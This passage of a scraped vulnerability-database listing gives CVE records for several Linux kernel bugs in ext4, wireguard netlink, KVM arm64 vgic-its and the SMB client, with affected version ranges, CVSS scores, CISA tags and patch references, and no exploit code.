"status": "unaffected",
"version": "4.19.308",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.270",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.211",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.150",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.80",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.19",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.7.*",
"status": "unaffected",
"version": "6.7.7",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.8",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "4.19.308",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.270",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.211",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.150",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.80",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.19",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.7.7",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.8",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\next4: avoid allocating blocks from corrupted group in ext4_mb_find_by_goal()\n\nPlaces the logic for checking if the group\u0027s block bitmap is corrupt under\nthe protection of the group lock to avoid allocating blocks from the group\nwith a corrupted block bitmap."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T08:56:09.839Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/5a6dcc4ad0f7f7fa8e8d127b5526e7c5f2d38a43"
},
{
"url": "https://git.kernel.org/stable/c/6b92b1bc16d691c95b152c6dbf027ad64315668d"
},
{
"url": "https://git.kernel.org/stable/c/ffeb72a80a82aba59a6774b0611f792e0ed3b0b7"
},
{
"url": "https://git.kernel.org/stable/c/8de8305a25bfda607fc13475ebe84b978c96d7ff"
},
{
"url": "https://git.kernel.org/stable/c/d639102f4cbd4cb65d1225dba3b9265596aab586"
},
{
"url": "https://git.kernel.org/stable/c/d3bbe77a76bc52e9d4d0a120f1509be36e25c916"
},
{
"url": "https://git.kernel.org/stable/c/21dbe20589c7f48e9c5d336ce6402bcebfa6d76a"
},
{
"url": "https://git.kernel.org/stable/c/832698373a25950942c04a512daa652c18a9b513"
}
],
"title": "ext4: avoid allocating blocks from corrupted group in ext4_mb_find_by_goal()",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-26772",
"datePublished": "2024-04-03T17:00:58.733Z",
"dateReserved": "2024-02-19T14:20:24.176Z",
"dateUpdated": "2025-05-04T08:56:09.839Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-26950 (GCVE-0-2024-26950)
Vulnerability from cvelistv5
Published
2024-05-01 05:18
Modified
2025-05-04 09:00
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
wireguard: netlink: access device through ctx instead of peer
The previous commit fixed a bug that led to a NULL peer->device being
dereferenced. It's actually easier and faster performance-wise to
instead get the device from ctx->wg. This semantically makes more sense
too, since ctx->wg->peer_allowedips.seq is compared with
ctx->allowedips_seq, basing them both in ctx. This also acts as a
defence in depth provision against freed peers.
References
| URL | Tags | ||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: e7096c131e5161fa3b8e52a650d7719d2857adfd Version: e7096c131e5161fa3b8e52a650d7719d2857adfd Version: e7096c131e5161fa3b8e52a650d7719d2857adfd Version: e7096c131e5161fa3b8e52a650d7719d2857adfd Version: e7096c131e5161fa3b8e52a650d7719d2857adfd Version: e7096c131e5161fa3b8e52a650d7719d2857adfd Version: e7096c131e5161fa3b8e52a650d7719d2857adfd |
||
{
"containers": {
"adp": [
{
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
}
},
{
"other": {
"content": {
"id": "CVE-2024-26950",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-06-06T18:55:56.220490Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "CWE-noinfo Not enough information",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2024-11-07T15:00:58.528Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2024-08-02T00:21:05.839Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/493aa6bdcffd90a4f82aa614fe4f4db0641b4068"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/4be453271a882c8ebc28df3dbf9e4d95e6ac42f5"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/09c3fa70f65175861ca948cb2f0f791e666c90e5"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/c991567e6c638079304cc15dff28748e4a3c4a37"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/93bcc1752c69bb309f4d8cfaf960ef1faeb34996"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/d44bd323d8bb8031eef4bdc44547925998a11e47"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/71cbd32e3db82ea4a74e3ef9aeeaa6971969c86f"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/net/wireguard/netlink.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "493aa6bdcffd90a4f82aa614fe4f4db0641b4068",
"status": "affected",
"version": "e7096c131e5161fa3b8e52a650d7719d2857adfd",
"versionType": "git"
},
{
"lessThan": "4be453271a882c8ebc28df3dbf9e4d95e6ac42f5",
"status": "affected",
"version": "e7096c131e5161fa3b8e52a650d7719d2857adfd",
"versionType": "git"
},
{
"lessThan": "09c3fa70f65175861ca948cb2f0f791e666c90e5",
"status": "affected",
"version": "e7096c131e5161fa3b8e52a650d7719d2857adfd",
"versionType": "git"
},
{
"lessThan": "c991567e6c638079304cc15dff28748e4a3c4a37",
"status": "affected",
"version": "e7096c131e5161fa3b8e52a650d7719d2857adfd",
"versionType": "git"
},
{
"lessThan": "93bcc1752c69bb309f4d8cfaf960ef1faeb34996",
"status": "affected",
"version": "e7096c131e5161fa3b8e52a650d7719d2857adfd",
"versionType": "git"
},
{
"lessThan": "d44bd323d8bb8031eef4bdc44547925998a11e47",
"status": "affected",
"version": "e7096c131e5161fa3b8e52a650d7719d2857adfd",
"versionType": "git"
},
{
"lessThan": "71cbd32e3db82ea4a74e3ef9aeeaa6971969c86f",
"status": "affected",
"version": "e7096c131e5161fa3b8e52a650d7719d2857adfd",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/net/wireguard/netlink.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "5.6"
},
{
"lessThan": "5.6",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.215",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.154",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.84",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.24",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.7.*",
"status": "unaffected",
"version": "6.7.12",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.8.*",
"status": "unaffected",
"version": "6.8.3",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.9",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.215",
"versionStartIncluding": "5.6",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.154",
"versionStartIncluding": "5.6",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.84",
"versionStartIncluding": "5.6",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.24",
"versionStartIncluding": "5.6",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.7.12",
"versionStartIncluding": "5.6",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.8.3",
"versionStartIncluding": "5.6",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.9",
"versionStartIncluding": "5.6",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nwireguard: netlink: access device through ctx instead of peer\n\nThe previous commit fixed a bug that led to a NULL peer-\u003edevice being\ndereferenced. It\u0027s actually easier and faster performance-wise to\ninstead get the device from ctx-\u003ewg. This semantically makes more sense\ntoo, since ctx-\u003ewg-\u003epeer_allowedips.seq is compared with\nctx-\u003eallowedips_seq, basing them both in ctx. This also acts as a\ndefence in depth provision against freed peers."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T09:00:31.028Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/493aa6bdcffd90a4f82aa614fe4f4db0641b4068"
},
{
"url": "https://git.kernel.org/stable/c/4be453271a882c8ebc28df3dbf9e4d95e6ac42f5"
},
{
"url": "https://git.kernel.org/stable/c/09c3fa70f65175861ca948cb2f0f791e666c90e5"
},
{
"url": "https://git.kernel.org/stable/c/c991567e6c638079304cc15dff28748e4a3c4a37"
},
{
"url": "https://git.kernel.org/stable/c/93bcc1752c69bb309f4d8cfaf960ef1faeb34996"
},
{
"url": "https://git.kernel.org/stable/c/d44bd323d8bb8031eef4bdc44547925998a11e47"
},
{
"url": "https://git.kernel.org/stable/c/71cbd32e3db82ea4a74e3ef9aeeaa6971969c86f"
}
],
"title": "wireguard: netlink: access device through ctx instead of peer",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-26950",
"datePublished": "2024-05-01T05:18:29.902Z",
"dateReserved": "2024-02-19T14:20:24.198Z",
"dateUpdated": "2025-05-04T09:00:31.028Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-26598 (GCVE-0-2024-26598)
Vulnerability from cvelistv5
Published
2024-02-23 14:46
Modified
2025-05-04 08:51
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
KVM: arm64: vgic-its: Avoid potential UAF in LPI translation cache
There is a potential UAF scenario in the case of an LPI translation
cache hit racing with an operation that invalidates the cache, such
as a DISCARD ITS command. The root of the problem is that
vgic_its_check_cache() does not elevate the refcount on the vgic_irq
before dropping the lock that serializes refcount changes.
Have vgic_its_check_cache() raise the refcount on the returned vgic_irq
and add the corresponding decrement after queueing the interrupt.
References
| URL | Tags | ||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 |
||
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-02T00:07:19.689Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/d04acadb6490aa3314f9c9e087691e55de153b88"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/ba7be666740847d967822bed15500656b26bc703"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/12c2759ab1343c124ed46ba48f27bd1ef5d2dff4"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/dba788e25f05209adf2b0175eb1691dc89fb1ba6"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/65b201bf3e9af1b0254243a5881390eda56f72d1"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/dd3956a1b3dd11f46488c928cb890d6937d1ca80"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/ad362fe07fecf0aba839ff2cc59a3617bd42c33f"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00016.html"
}
],
"title": "CVE Program Container"
},
{
"affected": [
{
"cpes": [
"cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*"
],
"defaultStatus": "unknown",
"product": "linux_kernel",
"vendor": "linux",
"versions": [
{
"lessThan": "d04acadb6490",
"status": "affected",
"version": "1da177e4c3f4",
"versionType": "custom"
},
{
"lessThan": "ba7be6667408",
"status": "affected",
"version": "1da177e4c3f4",
"versionType": "custom"
},
{
"lessThan": "12c2759ab134",
"status": "affected",
"version": "1da177e4c3f4",
"versionType": "custom"
},
{
"lessThan": "dba788e25f05",
"status": "affected",
"version": "1da177e4c3f4",
"versionType": "custom"
},
{
"lessThan": "65b201bf3e9a",
"status": "affected",
"version": "1da177e4c3f4",
"versionType": "custom"
},
{
"lessThan": "dd3956a1b3dd",
"status": "affected",
"version": "1da177e4c3f4",
"versionType": "custom"
},
{
"lessThan": "ad362fe07fec",
"status": "affected",
"version": "1da177e4c3f4",
"versionType": "custom"
},
{
"lessThanOrEqual": "5.5",
"status": "unaffected",
"version": "5.4.269",
"versionType": "custom"
},
{
"lessThanOrEqual": "5.11",
"status": "unaffected",
"version": "5.10.209",
"versionType": "custom"
},
{
"lessThanOrEqual": "5.16",
"status": "unaffected",
"version": "5.15.148",
"versionType": "custom"
},
{
"lessThanOrEqual": "6.2",
"status": "unaffected",
"version": "6.1.75",
"versionType": "custom"
},
{
"lessThanOrEqual": "6.7",
"status": "unaffected",
"version": "6.6.14",
"versionType": "custom"
},
{
"lessThanOrEqual": "6.8",
"status": "unaffected",
"version": "6.7.2",
"versionType": "custom"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.8",
"versionType": "custom"
}
]
}
],
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 7.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
}
},
{
"other": {
"content": {
"id": "CVE-2024-26598",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "total"
}
],
"role": "CISA Coordinator",
"timestamp": "2025-04-22T16:15:47.782832Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-416",
"description": "CWE-416 Use After Free",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2025-04-22T16:16:01.155Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"arch/arm64/kvm/vgic/vgic-its.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "d04acadb6490aa3314f9c9e087691e55de153b88",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "ba7be666740847d967822bed15500656b26bc703",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "12c2759ab1343c124ed46ba48f27bd1ef5d2dff4",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "dba788e25f05209adf2b0175eb1691dc89fb1ba6",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "65b201bf3e9af1b0254243a5881390eda56f72d1",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "dd3956a1b3dd11f46488c928cb890d6937d1ca80",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "ad362fe07fecf0aba839ff2cc59a3617bd42c33f",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"arch/arm64/kvm/vgic/vgic-its.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.269",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.209",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.148",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.75",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.14",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.7.*",
"status": "unaffected",
"version": "6.7.2",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.8",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.269",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.209",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.148",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.75",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.14",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.7.2",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.8",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nKVM: arm64: vgic-its: Avoid potential UAF in LPI translation cache\n\nThere is a potential UAF scenario in the case of an LPI translation\ncache hit racing with an operation that invalidates the cache, such\nas a DISCARD ITS command. The root of the problem is that\nvgic_its_check_cache() does not elevate the refcount on the vgic_irq\nbefore dropping the lock that serializes refcount changes.\n\nHave vgic_its_check_cache() raise the refcount on the returned vgic_irq\nand add the corresponding decrement after queueing the interrupt."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T08:51:55.492Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/d04acadb6490aa3314f9c9e087691e55de153b88"
},
{
"url": "https://git.kernel.org/stable/c/ba7be666740847d967822bed15500656b26bc703"
},
{
"url": "https://git.kernel.org/stable/c/12c2759ab1343c124ed46ba48f27bd1ef5d2dff4"
},
{
"url": "https://git.kernel.org/stable/c/dba788e25f05209adf2b0175eb1691dc89fb1ba6"
},
{
"url": "https://git.kernel.org/stable/c/65b201bf3e9af1b0254243a5881390eda56f72d1"
},
{
"url": "https://git.kernel.org/stable/c/dd3956a1b3dd11f46488c928cb890d6937d1ca80"
},
{
"url": "https://git.kernel.org/stable/c/ad362fe07fecf0aba839ff2cc59a3617bd42c33f"
}
],
"title": "KVM: arm64: vgic-its: Avoid potential UAF in LPI translation cache",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-26598",
"datePublished": "2024-02-23T14:46:26.672Z",
"dateReserved": "2024-02-19T14:20:24.128Z",
"dateUpdated": "2025-05-04T08:51:55.492Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2023-6606 (GCVE-0-2023-6606)
Vulnerability from cvelistv5
Published
2023-12-08 16:58
Modified
2025-11-08 07:10
Severity ?
VLAI Severity ?
EPSS score ?
CWE
- CWE-125 - Out-of-bounds Read
Summary
An out-of-bounds read vulnerability was found in smbCalcSize in fs/smb/client/netmisc.c in the Linux Kernel. This issue could allow a local attacker to crash the system or leak internal kernel information.
References
| URL | Tags | ||||||||||||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||||||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | |||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| Red Hat | Red Hat Enterprise Linux 8 |
Unaffected: 0:4.18.0-513.18.1.rt7.320.el8_9 < * cpe:/a:redhat:enterprise_linux:8::nfv cpe:/a:redhat:enterprise_linux:8::realtime |
|||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
|
|||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2023-6606",
"options": [
{
"Exploitation": "poc"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2023-12-11T21:20:47.767463Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-07-11T14:22:01.806Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2024-08-02T08:35:14.877Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"name": "RHSA-2024:0723",
"tags": [
"vendor-advisory",
"x_refsource_REDHAT",
"x_transferred"
],
"url": "https://access.redhat.com/errata/RHSA-2024:0723"
},
{
"name": "RHSA-2024:0725",
"tags": [
"vendor-advisory",
"x_refsource_REDHAT",
"x_transferred"
],
"url": "https://access.redhat.com/errata/RHSA-2024:0725"
},
{
"name": "RHSA-2024:0881",
"tags": [
"vendor-advisory",
"x_refsource_REDHAT",
"x_transferred"
],
"url": "https://access.redhat.com/errata/RHSA-2024:0881"
},
{
"name": "RHSA-2024:0897",
"tags": [
"vendor-advisory",
"x_refsource_REDHAT",
"x_transferred"
],
"url": "https://access.redhat.com/errata/RHSA-2024:0897"
},
{
"name": "RHSA-2024:1188",
"tags": [
"vendor-advisory",
"x_refsource_REDHAT",
"x_transferred"
],
"url": "https://access.redhat.com/errata/RHSA-2024:1188"
},
{
"name": "RHSA-2024:1248",
"tags": [
"vendor-advisory",
"x_refsource_REDHAT",
"x_transferred"
],
"url": "https://access.redhat.com/errata/RHSA-2024:1248"
},
{
"name": "RHSA-2024:1404",
"tags": [
"vendor-advisory",
"x_refsource_REDHAT",
"x_transferred"
],
"url": "https://access.redhat.com/errata/RHSA-2024:1404"
},
{
"name": "RHSA-2024:2094",
"tags": [
"vendor-advisory",
"x_refsource_REDHAT",
"x_transferred"
],
"url": "https://access.redhat.com/errata/RHSA-2024:2094"
},
{
"tags": [
"vdb-entry",
"x_refsource_REDHAT",
"x_transferred"
],
"url": "https://access.redhat.com/security/cve/CVE-2023-6606"
},
{
"tags": [
"x_transferred"
],
"url": "https://bugzilla.kernel.org/show_bug.cgi?id=218218"
},
{
"name": "RHBZ#2253611",
"tags": [
"issue-tracking",
"x_refsource_REDHAT",
"x_transferred"
],
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2253611"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/01/msg00004.html"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00016.html"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/a:redhat:enterprise_linux:8::nfv",
"cpe:/a:redhat:enterprise_linux:8::realtime"
],
"defaultStatus": "affected",
"packageName": "kernel-rt",
"product": "Red Hat Enterprise Linux 8",
"vendor": "Red Hat",
"versions": [
{
"lessThan": "*",
"status": "unaffected",
"version": "0:4.18.0-513.18.1.rt7.320.el8_9",
"versionType": "rpm"
}
]
},
{
